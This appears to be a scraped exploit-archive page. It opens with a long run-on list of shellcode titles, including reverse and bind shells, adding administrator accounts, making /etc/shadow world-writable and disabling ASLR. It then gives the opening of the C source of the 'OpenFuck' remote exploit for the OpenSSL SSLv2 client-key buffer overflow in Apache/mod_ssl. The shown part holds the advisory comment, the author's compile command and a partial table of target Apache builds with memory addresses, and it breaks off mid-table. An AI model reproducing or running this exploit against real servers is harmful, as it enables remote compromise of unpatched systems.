Polymorphic Null-Free Shellcode (46 bytes) Windows XP SP3 English - MessageBoxA Shellcode (87 bytes) BSD/x86 - Bind Shell 2525/TCP Shellcode (167 bytes) Win32 - Checksum Routine Shellcode (18 bytes) Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes) Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes) Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes) BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes) Windows x86 - Checksum Routine Shellcode (18 bytes) Win32/XP SP3 (TR) - Add Administrator 'zrl' Shellcode (127 bytes) Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes) Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes) Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes) Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) ARM - Bind Connect (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode ARM - Loader Port 0x1337 Shellcode ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode ARM - Bind (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode ARM - Loader (0x1337/TCP) Shellcode ARM - ifconfig eth0 192.168.0.2 up Shellcode ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes) Win32 - Speaking 'You got pwned!' Shellcode FreeBSD/x86 - connect back Shellcode (81 bytes) BSD/x86 - Bind Shell 31337/TCP + fork Shellcode (111 bytes) Win32 - eggsearch Shellcode (33 bytes) Linux/SuperH (sh4) - setuid(0) + chmod(_/etc/shadow__ 0666) + exit(0) Shellcode (43 bytes) Linux/x86 - Bind Shell Netcat 6666/TCP Shellcode (69 bytes) OSX/Intel (x86-64) - Reverse TCP Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes) Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes) Linux/x86 - ASLR deactivation Shellcode (83 bytes) Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit) Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes) ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) Windows 5.0 < 7.0 x86 - Speaking _You got pwned!_ Null-Free Shellcode FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator) BSD/x86 - Bind TCP Shell (31337/TCP) + fork Shellcode (111 bytes) Windows x86 - eggsearch Shellcode (33 bytes) Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69 bytes) OSX/Intel (x86-64) - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes) Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) Linux/x86 - Disable ASLR Security Shellcode (83 bytes) Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit) Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes) Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes) Linux/x86 - Egghunter Shellcode (29 bytes) Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) Linux/x86 - Egghunter Null-Free Shellcode (29 bytes) Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes) Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes) Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator) Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes) Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes) Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes) Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes) Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes) Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes) Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes) Linux/ARM (Raspberry Pi) - Reverse TCP Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes) Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes) Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes) Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes) Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes) Windows x64 - Bind TCP Shell Shellcode (508 bytes) Windows XP Professional SP3 - calc Full ROP Shellcode (428 bytes) Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes) Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes) Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes) Windows RT ARM - Bind Shell 4444/TCP Shellcode Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode Windows - Messagebox Shellcode (113 bytes) Linux/MIPS (Little Endian) - Reverse TCP Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes) Windows 7 x86 - Bind Shell 4444/TCP Shellcode (357 Bytes) Windows - Add Administrator 'BroK3n' Shellcode (194 bytes) Windows - Messagebox Null-FreeShellcode (113 bytes) Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes) Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes) Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes) Linux/x86-64 - Reverse TCP Password (Z~r0) Shell (127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes) Windows x86 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows x64 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes) Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows XP x86-64 - Download File + Execute Shellcode (Generator) Linux/MIPS (Little Endian) - Chmod 666 /etc/shadow Shellcode (55 bytes) Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd Shellcode (55 bytes) Windows XP x86-64 - Download File + Execute Shellcode (Generator) Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes) Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes) Linux/x86 - execve(_/bin/sh_) (ROT13 Encoded) Shellcode (68 bytes) Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes) Linux/x86 - execve(_/bin/sh_) ROT13 Encoded Shellcode (68 bytes) Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes) Linux/x86 - Reverse TCP Shell (192.168.1.133:33333) Shellcode (72 bytes) Linux/x86 - Bind Shell 33333/TCP Shellcode (96 bytes) Linux/x86 - Disable ASLR Shellcode (84 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333) Shellcode (72 bytes) Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes) Linux/x86 - Disable ASLR Security Shellcode (84 bytes) Linux/x86 - Typewriter Shellcode (Generator) Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes) Linux/x86 - Typewriter Shellcode (Generator) Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes) Win32/XP SP3 - Create ('file.txt') Shellcode (83 bytes) Win32/XP SP3 - Restart computer Shellcode (57 bytes) Linux/x86 - custom execve Shellcode (Encoder/Decoder) (Generator) Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes) Windows XP SP3 x86 - Restart Computer Shellcode (57 bytes) Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator) Linux/x86 - Bind Shell /bin/nc -le /bin/sh -vp 17771 Shellcode (58 bytes) Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes) Linux/x86 - chmod() 777 /etc/shadow + exit() Shellcode (33 bytes) Linux/x86 - execve /bin/sh Shellcode (2) (21 bytes) Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) Linux/x86 - Bind Shell Netcat 5555/TCP Shellcode (60 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes) Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes) Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes) Linux/x86 - chmod('/etc/passwd'_0777) Shellcode (42 bytes) Linux/x86 - chmod('/etc/gshadow') Shellcode (37 bytes) Linux/x86 - chmod('/etc/shadow'_'0777') Shellcode (42 bytes) Linux/x86 - exec('/bin/dash') Shellcode (45 bytes) Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes) Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes) Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes) Linux/x86 - exec(_/bin/dash_) Shellcode (45 bytes) Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes) Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes) Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes) Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes) Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes) Mainframe/System Z - Bind Shell 12345/TCP Shellcode (2488 bytes) OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes) Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes) Linux/x86 - Create file with permission 7775 + exit Shellcode (Generator) Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator) OSX/x86-64 - Bind 4444/TCP Null-free Shellcode (144 bytes) Linux/x86-64 - /bin/sh Shellcode (34 bytes) Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes) OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes) Linux/x86-64 - execve /bin/sh Shellcode (34 bytes) Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes) Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes) Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes) Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python) Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes) Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes) Windows XP < 10 - WinExec Null-Free Shellcode (Generator) Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes) Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes) Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Shellcode (151 bytes) Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes) Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes) Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes) Linux x86/x86-64 - Bind Shell (4444/TCP) Shellcode (251 bytes) Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes) Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (135 bytes) Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes) Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes) Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes) Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes) Linux/x86-64 - Bind 5600/TCP Shellcode (81 bytes) Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes) Linux/x86-64 - Bind 5600/TCP Shellcode (86 bytes) Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes) Linux/x86 - Reverse TCP Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes) Linux/x86 - Bind 1472/TCP Shell (IPv6) Shellcode (1250 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes) Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes) Win32 .Net Framework - Execute Native x86 Shellcode Linux/x86-64 - Bind 1472/TCP Shell (IPv6) Shellcode (199 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes) Windows .Net Framework x86 - Execute Native x86 Shellcode Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes) Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes) Linux/x86 - Bind Shell 1234/TCP (Configurable Port) Shellcode (87 bytes) Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator) Linux/x86 - Bind Shell 4444/TCP Shellcode (656 bytes) Linux/x86-64 - execve (XOR Encoded) Shellcode (84 bytes) Linux/Windows/BSD x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes) Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes) BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) Linux/x86 - Bind Shell /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes) Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes) Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes) Linux/x86-64 - Bind Netcat Shellcode (64 bytes) Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes) Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes) Linux/x86 - Reverse TCP Shell (192.168.227.129:4444) Shellcode (75 bytes) Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Shellcode (172 bytes) Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes) Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes) Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes) Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes) Linux/x86 - Reverse TCP /bin/sj Shell (192.168.227.129:4444) Shellcode (75 bytes) Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes) Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes) Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes) Linux/CRISv32 - Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes) Linux/x86 - Bind Netcat 98/TCP + UDP Shellcode (44/52 bytes) Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes) Linux/x86 - Reverse TCP ZSH (127.255.255.254:9090/TCP) Shellcode (80 bytes) Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes) Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes) Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes) Windows x64 - WinExec() Shellcode (93 bytes) Windows x64 - cmd.exe WinExec() Shellcode (93 bytes) Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes) Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes) Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes) Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes) Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes) Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes) Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (Genearator) (129 bytes) Linux/x86 - Reverse TCP Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes) Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes) Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator) Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes) Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes) Linux/x86-64 - Reverse TCP Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes) Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes) Windows x86 - Executable Directory Search Shellcode (130 bytes) Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes) Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes) Linux/x86-64 - Reverse Netcat Polymorphic Shell (127.0.0.1:1234) Shellcode (106 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) Linux/x86 - Bind Shell Shellcode (44 bytes) Linux/x86 - Bind TCP /bin/sh Random Port Shell Shellcode (44 bytes) Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Shellcode (67 bytes) Linux/x86 - Reverse /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes) Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes) Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes) Linux/x86 - Disable ASLR Shellcode (80 bytes) Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Shellcode (113 bytes) Linux/x86 - Disable ASLR Security Shellcode (80 bytes) Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes) Linux/x86-64 - /bin/sh Shellcode (31 bytes) Linux/x86 - execve(/bin/sh) setuid(0) setgid(0) (XOR Encoded) Shellcode (66 bytes) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86 - Reverse UDP Shell (127.0.0.1:53/UDP) Shellcode (668 bytes) Linux/x86 - Bind Shell 4444/TCP Shellcode (75 bytes) Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes) Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes) Linux x86 - /bin/sh Shellcode (24 bytes) Linux x86 - execve /bin/sh Shellcode (24 bytes) Linux/x86_64 - kill All Processes Shellcode (19 bytes) Linux/x86_64 - Kill All Processes Shellcode (19 bytes) Php Cloud mining Script - Authentication Bypass (Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass
1437 lines
No EOL
36 KiB
C
Executable file
1437 lines
No EOL
36 KiB
C
Executable file
/*
|
|
source: http://www.securityfocus.com/bid/5363/info
|
|
|
|
A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
|
|
|
|
The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.
|
|
|
|
***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available.
|
|
*/
|
|
|
|
/*
|
|
* VERY PRIV8 spabam SPAX@zone-h.org
|
|
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
|
|
*
|
|
*/
|
|
|
|
#include <arpa/inet.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netdb.h>
|
|
#include <errno.h>
|
|
#include <string.h>
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
|
|
#include <openssl/ssl.h>
|
|
#include <openssl/rsa.h>
|
|
#include <openssl/x509.h>
|
|
#include <openssl/evp.h>
|
|
|
|
/* update this if you add architectures */
|
|
#define MAX_ARCH 131
|
|
|
|
struct archs {
|
|
char* desc;
|
|
int func_addr; /* objdump -R /usr/sbin/apache | grep free */
|
|
} architectures[] = {
|
|
|
|
{
|
|
"Caldera OpenLinux (apache-1.3.26)",
|
|
0x080920e0
|
|
},
|
|
{
|
|
"Cobalt Sun 6.0 (apache-1.3.12)",
|
|
0x8120f0c
|
|
},
|
|
{
|
|
"Cobalt Sun 6.0 (apache-1.3.20)",
|
|
0x811dcb8
|
|
},
|
|
{
|
|
"Cobalt Sun x (apache-1.3.26)",
|
|
0x8123ac3
|
|
},
|
|
{
|
|
"Cobalt Sun x Fixed2 (apache-1.3.26)",
|
|
0x81233c3
|
|
},
|
|
{
|
|
"Conectiva 4 (apache-1.3.6)",
|
|
0x08075398
|
|
},
|
|
{
|
|
"Conectiva 4.1 (apache-1.3.9)",
|
|
0x0808f2fe
|
|
},
|
|
{
|
|
"Conectiva 6 (apache-1.3.14)",
|
|
0x0809222c
|
|
},
|
|
{
|
|
"Conectiva 7 (apache-1.3.12)",
|
|
0x0808f874
|
|
},
|
|
{
|
|
"Conectiva 7 (apache-1.3.19)",
|
|
0x08088aa0
|
|
},
|
|
{
|
|
"Conectiva 7/8 (apache-1.3.26)",
|
|
0x0808e628
|
|
},
|
|
{
|
|
"Conectiva 8 (apache-1.3.22)",
|
|
0x0808b2d0
|
|
},
|
|
{
|
|
"Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",
|
|
0x08095264
|
|
},
|
|
{
|
|
"Debian GNU Linux (apache_1.3.19-1)",
|
|
0x080966fc
|
|
},
|
|
{
|
|
"Debian GNU Linux (apache_1.3.22-2)",
|
|
0x08096aac
|
|
},
|
|
{
|
|
"Debian GNU Linux (apache-1.3.22-2.1)",
|
|
0x08083828
|
|
},
|
|
{
|
|
"Debian GNU Linux (apache-1.3.22-5)",
|
|
0x08083728
|
|
},
|
|
{
|
|
"Debian GNU Linux (apache_1.3.23-1)",
|
|
0x08085de8
|
|
},
|
|
{
|
|
"Debian GNU Linux (apache_1.3.24-2.1)",
|
|
0x08087d08
|
|
},
|
|
{ "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",
|
|
0x080873ac
|
|
},
|
|
{
|
|
"Debian GNU Linux (apache_1.3.24-3)",
|
|
0x08087d68
|
|
},
|
|
{
|
|
"Debian GNU Linux (apache-1.3.26-1)",
|
|
0x0080863c4
|
|
},
|
|
{
|
|
"Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",
|
|
0x080863cc
|
|
},
|
|
{ "Debian GNU Linux (apache-1.3.27)",
|
|
0x0080866a3
|
|
},
|
|
|
|
/* targets de BSD */
|
|
|
|
{ "FreeBSD (apache-1.3.9)", 0xbfbfde00 },
|
|
{ "FreeBSD (apache-1.3.11)", 0x080a2ea8 },
|
|
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 },
|
|
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 },
|
|
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c },
|
|
{ "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 },
|
|
{ "FreeBSD (apache-1.3.12)", 0x0809bd7c },
|
|
{ "FreeBSD (apache-1.3.14)", 0xbfbfdc00 },
|
|
{ "FreeBSD (apache-1.3.14)", 0x080ab68c },
|
|
{ "FreeBSD (apache-1.3.14)", 0x0808c76c },
|
|
{ "FreeBSD (apache-1.3.14)", 0x080a3fc8 },
|
|
{ "FreeBSD (apache-1.3.14)", 0x080ab6d8 },
|
|
{ "FreeBSD (apache-1.3.17_1)", 0x0808820c },
|
|
{ "FreeBSD (apache-1.3.19)", 0xbfbfdc00 },
|
|
{ "FreeBSD (apache-1.3.19_1)", 0x0808c96c },
|
|
{ "FreeBSD (apache-1.3.20)", 0x0808cb70 },
|
|
{ "FreeBSD (apache-1.3.20)", 0xbfbfc000 },
|
|
{ "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 },
|
|
{ "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 },
|
|
{ "FreeBSD (apache-1.3.22)", 0xbfbfc000 },
|
|
{ "FreeBSD (apache-1.3.22_7)", 0x0808d110 },
|
|
{ "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 },
|
|
{ "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 },
|
|
{ "FreeBSD (apache-1.3.24+2.8.8)", 0x080927f8 },
|
|
{ "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c },
|
|
{ "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec },
|
|
{ "FreeBSD (apache-1.3.27)", 0x080902e4 },
|
|
|
|
|
|
|
|
{
|
|
"Gentoo Linux (apache-1.3.24-r2)",
|
|
0x08086c34
|
|
},
|
|
{
|
|
"Mandrake Linux X.x (apache-1.3.22-10.1mdk)",
|
|
0x080808ab
|
|
},
|
|
{
|
|
"Mandrake Linux 7.1 (apache-1.3.14-2)",
|
|
0x0809f6c4
|
|
},
|
|
{
|
|
"Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",
|
|
0x0809d233
|
|
},
|
|
{
|
|
"Mandrake Linux 7.2 (apache-1.3.14-2mdk)",
|
|
0x0809f6ef
|
|
},
|
|
{
|
|
